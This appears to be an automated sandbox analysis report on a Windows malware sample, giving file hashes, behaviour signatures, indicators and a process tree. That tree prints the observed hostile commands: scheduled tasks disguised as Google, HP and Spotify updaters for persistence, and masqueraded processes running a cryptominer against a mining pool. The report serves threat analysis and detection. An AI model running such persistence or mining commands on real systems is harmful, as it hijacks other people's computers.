Analysis
-
max time kernel
297s -
max time network
300s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
-
submitted
04-07-2024 17:22
General
-
Target
[DemonArchives]0a47e2885329b83d82525cb438e57f7e.exe
-
Size
2.1MB
-
MD5
0a47e2885329b83d82525cb438e57f7e
-
SHA1
29346b4b5fc87c307001673061149a0b87b56c5b
-
SHA256
5d5e1582ff73932226faa633ebe171284d7f8ceef6642862e118ff377bd41b78
-
SHA512
99dbf4cdb706849cafb7f30016ea0a3f9fff85b20e4813e92bad63d369d66231d59d7ca8220d361cf71baf1f22a2e67d09e442ee27627f30d80818d00cc6f595
-
SSDEEP
49152:JEVUcGNLJpVCsGltfDZXUeSIo40DfOgBqT8kbrb41YM3wWOOEh/nFb:JE3GNmltKX4Of9BqT8Ob41YZW8/nFb
Malware Config
Signatures
-
Boot or Logon Autostart Execution: Active Setup 2 TTPs 7 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
-
Executes dropped EXE 3 IoCs
-
Loads dropped DLL 4 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
UPX packed file 3 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Adds Run key to start application 2 TTPs 8 IoCs
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
AutoIT Executable 11 IoCs
AutoIT scripts compiled to PE executables.
-
Suspicious use of SetThreadContext 22 IoCs
-
Drops file in Program Files directory 42 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 15 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 55 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\[DemonArchives]0a47e2885329b83d82525cb438e57f7e.exe"C:\Users\Admin\AppData\Local\Temp\[DemonArchives]0a47e2885329b83d82525cb438e57f7e.exe"1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\~0a47e288.exe"C:\Users\Admin\AppData\Local\Temp\~0a47e288.exe"2⤵
- Boot or Logon Autostart Execution: Active Setup
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DIR /A:D /S /B *3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DIR /A:D /S /B *3⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DIR /A:D /S /B *3⤵
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 34 /TN "HP Software Update" /TR "\"C:\Program Files\Windows Photo Viewer\HPWuSchd2.exe\""3⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 34 /TN "Spotify" /TR "\"C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\Spotify.exe\""3⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 35 /TN "AppExtender" /TR "\"C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\AppExtB.exe\""3⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 32 /TN "Google Update" /TR "\"C:\Program Files\DVD Maker\it-IT\GoogleUpdate.exe\""3⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /SC ONLOGON /TN "Comm Driver" /TR "\"C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\commh32.exe\""3⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exeC:\Users\Admin\AppData\Roaming\Mozilla\Firefox\plugin-container.exe3⤵
- Boot or Logon Autostart Execution: Active Setup
- Executes dropped EXE
- Adds Run key to start application
- Enumerates connected drives
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DIR /A:D /S /B *4⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DIR /A:D /S /B *4⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C DIR /A:D /S /B *4⤵
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 11 /TN "HP Software Update" /TR "\"C:\Program Files\Windows Photo Viewer\HPWuSchd2.exe\""4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 8 /TN "Spotify" /TR "\"C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\Spotify.exe\""4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 18 /TN "AppExtender" /TR "\"C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\AppExtB.exe\""4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 34 /TN "Google Update" /TR "\"C:\Program Files\DVD Maker\it-IT\GoogleUpdate.exe\""4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /SC ONLOGON /TN "Comm Driver" /TR "\"C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\commh32.exe\""4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -u node.bot6 -p x -o http://ypool.net:8082 -t 8 -m1284⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -u node.bot6 -p x -o http://ypool.net:8082 -t 8 -m1284⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" -u node.bot6 -p x -o http://ypool.net:8082 -t 8 -m1284⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" -u node.bot6 -p x -o http://ypool.net:8082 -t 8 -m1284⤵
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -u node.bot6 -p x -o http://ypool.net:8082 -t 8 -m1284⤵
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -u node.bot6 -p x -o http://ypool.net:8082 -t 8 -m1284⤵
-
-
C:\Program Files\Java\jre7\bin\javaw.exe"C:\Program Files\Java\jre7\bin\javaw.exe" -u node.bot6 -p x -o http://ypool.net:8082 -t 8 -m1284⤵
-
-
C:\Program Files\Java\jre7\bin\javaw.exe"C:\Program Files\Java\jre7\bin\javaw.exe" -u node.bot6 -p x -o http://ypool.net:8082 -t 8 -m1284⤵
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" -u node.bot6 -p x -o http://ypool.net:8082 -t 8 -m1284⤵
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" -u node.bot6 -p x -o http://ypool.net:8082 -t 8 -m1284⤵
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" -u node.bot6 -p x -o http://ypool.net:8082 -t 8 -m1284⤵
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 9 /TN "HP Software Update" /TR "\"C:\Program Files\Windows Photo Viewer\HPWuSchd2.exe\""4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 17 /TN "Spotify" /TR "\"C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\Spotify.exe\""4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 34 /TN "AppExtender" /TR "\"C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\AppExtB.exe\""4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /RL HIGHEST /SC MINUTE /MO 12 /TN "Google Update" /TR "\"C:\Program Files\DVD Maker\it-IT\GoogleUpdate.exe\""4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /F /SC ONLOGON /TN "Comm Driver" /TR "\"C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\commh32.exe\""4⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -u node.bot6 -p x -o http://ypool.net:8085 -t 8 -m1284⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -u node.bot6 -p x -o http://ypool.net:8085 -t 8 -m1284⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" -u node.bot6 -p x -o http://ypool.net:8085 -t 8 -m1284⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" -u node.bot6 -p x -o http://ypool.net:8085 -t 8 -m1284⤵
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -u node.bot6 -p x -o http://ypool.net:8085 -t 8 -m1284⤵
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -u node.bot6 -p x -o http://ypool.net:8085 -t 8 -m1284⤵
-
-
C:\Program Files\Java\jre7\bin\javaw.exe"C:\Program Files\Java\jre7\bin\javaw.exe" -u node.bot6 -p x -o http://ypool.net:8085 -t 8 -m1284⤵
-
-
C:\Program Files\Java\jre7\bin\javaw.exe"C:\Program Files\Java\jre7\bin\javaw.exe" -u node.bot6 -p x -o http://ypool.net:8085 -t 8 -m1284⤵
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" -u node.bot6 -p x -o http://ypool.net:8085 -t 8 -m1284⤵
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" -u node.bot6 -p x -o http://ypool.net:8085 -t 8 -m1284⤵
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" -u node.bot6 -p x -o http://ypool.net:8085 -t 8 -m1284⤵
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.6MB
MD571c88f5d6c5bc5d2c744fa73e581a797
SHA1814e921f896b756297be31a2c758e66a49f31f6a
SHA2561912ec3a958c3e1d021cc43941cce66ad02009072f396554910de7d302c76d74
SHA5125ec5135afcdd2ac81b6bf0fb995ad6095a88f485e0198a5593cfb2fef77b5a9ea8af5d593b5624dd6f82bda95445c5cc83489f92f5e1623814cc74b1730c5ab6
-
Filesize
2.6MB
MD5dcc8e9a880b5d1b05ca9fe901e3be8ff
SHA1b0c4c60bef2319bec568fabd086fca621f4e2360
SHA2561c9cd6cdb6f15c6a6bd5c0ab9230705597524448e6d3cf40435f80a31eb49081
SHA5121013474d5edaa79bd59087f551ef875c2efe7df24b279c46dbf4cb948dfa791e0603ab759b82e8b069ffe08745311eb464d638dd7716a47b1e255337c906d687
-
Filesize
2.6MB
MD541e51a860acec7af8c3469b46fab93e1
SHA103413b23ed6014d49edbf31b7c6f83c581974c3b
SHA25698807ce48156b3f9f8664b65ec912044ecdb8c58d1c8db1cb8a483a72b42c821
SHA51229545b54bf3839c82483b48f24818b954787f26e703a5b4e586f51cfaf8205a4e94b03d4c7696cb1b183e58bf11b714fb1009f8ccca614dec3883cd8ce81d163
-
Filesize
2.6MB
MD530d571a75925f0032e30a76503996a78
SHA15ff5327844678d74d1971908a6900e2e67bc96d3
SHA25622bd2c7222e0d6cdabd3e00fa00f4ad43418a67d3e7498c156827174ab52fa22
SHA5124a3a97e7d751b620d964849bfdf51fdf85092512060522d95ca5852679e519653fd9fa3e13e78196f061bcbd4508b86db1ef3f4403f9f415b7c78e6ad261e814
-
Filesize
2.6MB
MD5a7290618afd84e3d6afc8a7b13f70c12
SHA1b72b3ede5c8672024a47c207a3962170fc372f52
SHA2561b75bc3bd6258f8cd0ae1803f65797c53423818e392003581932c320c0e2d35f
SHA512260605f3c86fb57064fc277cb5f2c6db83df95838cddfbbd726925e64f869692539775ba3bdc286d3cf8a6ad2f86c92b4862f9f0f3e2042e33d40196d8da6907
-
Filesize
2B
MD581051bcc2cf1bedf378224b0a93e2877
SHA1ba8ab5a0280b953aa97435ff8946cbcbb2755a27
SHA2567eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
SHA5121b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d
-
Filesize
2.6MB
MD5b5655497b31e458f7955d35117c6f439
SHA1c4ca954c90ea3c91e7b0c1719ca57695a397716c
SHA2565ae847639e17edfadacdb4a0b82319e2f6b11901e0a02c3c5046264e3cb1b750
SHA512859f3ec3f39693de38def8f6d52842cd1aaf7baf50f227a81670e2fe1956a593a9611a84ac424352c8814947ae384847e1ca9e933e6b31d8bf987d6310a027b1
-
Filesize
2.6MB
MD5577427b4d0735dcba82c1bca6da174cf
SHA1c95241f92e50c9ef33dbda0be59687b6208a3963
SHA256be77542fa98288750e2a2cd808e7bd4512f7ff76a85d849fa568c317eeb376cd
SHA512113d6736b93689e30a66e423b1d36ecd97913e566e3a5262a3a6fc5b445dfa938de95e3e53c7ac105f1a01761e461afd9618fce3bd548d73c117d681b919c60d
-
Filesize
2.6MB
MD545704c2b9b5fca3011a1214ae26bb3f4
SHA18d7384bf9150946f30ab155955c88713c5c8ee3b
SHA25622504a61daa2db1d8f42b4a4563d687d611d957408d64e9c27ad88b4cf593b9b
SHA5126904a943be4d0dadc559df893e13dcf28d2a48a05704ecd776c8f2a2d680c49b6ec68c4fa2288f208f9dd0e50788a4895e92d1fd28645a5c0ceeda4c54b839fb
-
Filesize
2.6MB
MD586f56716bb66aec6900ec7d81c8ccce9
SHA142e53ad2cc9283bfba09ad5bdcb9702d13c70c72
SHA2560b0daeb94070b6006bb2fc7b44c748e3151ead04538230f65ad57a0121d75e4a
SHA5121912ceb2012800eadaf84aa30f0863221bc5efe43c00c798564ecba08a4ebd9f491bde6f6cf967dcebea1c8d50d943eabc0190beea6f99406d5d6511162044fd
-
Filesize
126KB
MD52e9a71e4ee33d190056e081e6726fa56
SHA1db355fc276b8174e1753f45dbdf52536f7740316
SHA2569262765163efb9dd31f8e9a3cd3ca1b06367524deb4272343f22e554198449da
SHA5120425620770da2c1b297da33fb92f91444dd547a39e08bd3d670742ee6172f259aad071ee2fe08a8f61725a67703264cec7e1465b6d2bce644d64753b63209472
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
284KB
-
Filesize
284KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
716KB
-
Filesize
4KB
-
Filesize
716KB
-
Filesize
716KB
-
Filesize
4KB
-
Filesize
284KB
-
Filesize
284KB
-
Filesize
4KB
-
Filesize
284KB
-
Filesize
4KB
-
Filesize
284KB
-
Filesize
284KB
-
Filesize
284KB
-
Filesize
4KB